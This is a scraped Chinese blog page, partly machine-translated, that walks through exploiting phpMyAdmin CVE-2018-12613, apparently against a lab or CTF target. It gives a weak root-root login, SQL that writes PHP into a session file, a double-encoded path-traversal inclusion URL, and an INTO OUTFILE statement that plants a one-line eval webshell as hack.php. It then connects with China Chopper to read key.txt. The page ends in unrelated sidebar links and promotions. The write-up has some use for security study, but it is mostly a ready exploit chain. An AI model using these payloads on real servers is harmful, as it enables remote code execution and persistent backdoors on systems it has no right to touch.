当前位置:网站首页>PhpMyAdmin stage file contains analysis traceability
PhpMyAdmin stage file contains analysis traceability
2022-07-03 13:45:00 【this is hhhhp】
phpMyAdmin Vulnerability utilization summary :PhpMyAdmin Vulnerability utilization summary - Speak only - Blog Garden
Hole number :CVE-2018-12613
Background introduction
phpMyAdmin It's an open source set 、 be based on Web Of MySQL Database management tools . Its index.php One file in contains logic , The check can be bypassed by secondary coding , Cause Remote File Inclusion Vulnerability .
One . Weak password login
root-root
Two . utilize sql sentence , take php Code writing Session In file
3、 ... and . contain Session file
http://219.153.49.228:44273/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_***
*** representative phpmyadmin Of cookie Value ,f12 Storage can be seen
View the absolute path of the current website
Four . Upload a word of Trojan
select '<?php @eval($_POST[SBW])?> ' into outfile '/var/www/html/hack.php'
Upload successful
5、 ... and . Chopper connection to get key.txt
边栏推荐
- Start signing up CCF C ³- [email protected] chianxin: Perspective of Russian Ukrainian cyber war - Security confrontation and sanctions g
- Unity render streaming communicates with unity through JS
- MapReduce实现矩阵乘法–实现代码
- MySQL
- PowerPoint tutorial, how to save a presentation as a video in PowerPoint?
- Flutter动态化 | Fair 2.5.0 新版本特性
- Bidirectional linked list (we only need to pay attention to insert and delete functions)
- 8 Queen question
- Brief analysis of tensorboard visual processing cases
- 软件测试工作那么难找,只有外包offer,我该去么?
猜你喜欢
Resource Cost Optimization Practice of R & D team
今日睡眠质量记录77分
MySQL constraints
物联网毕设 --(STM32f407连接云平台检测数据)
Mobile phones and computers can be used, whole people, spoof code connections, "won't you Baidu for a while" teach you to use Baidu
The principle of human voice transformer
JSP and filter
[how to solve FAT32 when the computer is inserted into the U disk or the memory card display cannot be formatted]
Universal dividend source code, supports the dividend of any B on the BSC
常见的几种最优化方法Matlab原理和深度分析
随机推荐
掌握Cypress命令行选项,是真正掌握Cypress的基础
双链笔记 RemNote 综合评测:快速输入、PDF 阅读、间隔重复/记忆
Kivy tutorial how to load kV file design interface by string (tutorial includes source code)
106. How to improve the readability of SAP ui5 application routing URL
AI scores 81 in high scores. Netizens: AI model can't avoid "internal examination"!
MySQL constraints
Smbms project
The principle of human voice transformer
R语言使用data函数获取当前R环境可用的示例数据集:获取datasets包中的所有示例数据集、获取所有包的数据集、获取特定包的数据集
【电脑插入U盘或者内存卡显示无法格式化FAT32如何解决】
Unity Render Streaming通过Js与Unity自定义通讯
php 迷宫游戏
MapReduce implements matrix multiplication - implementation code
阿南的疑惑
TensorBoard可视化处理案例简析
CVPR 2022 | interpretation of 6 excellent papers selected by meituan technical team
全面发展数字经济主航道 和数集团积极推动UTONMOS数藏市场
MySQL_ JDBC
Tutoriel PowerPoint, comment enregistrer une présentation sous forme de vidéo dans Powerpoint?
SQL Injection (POST/Search)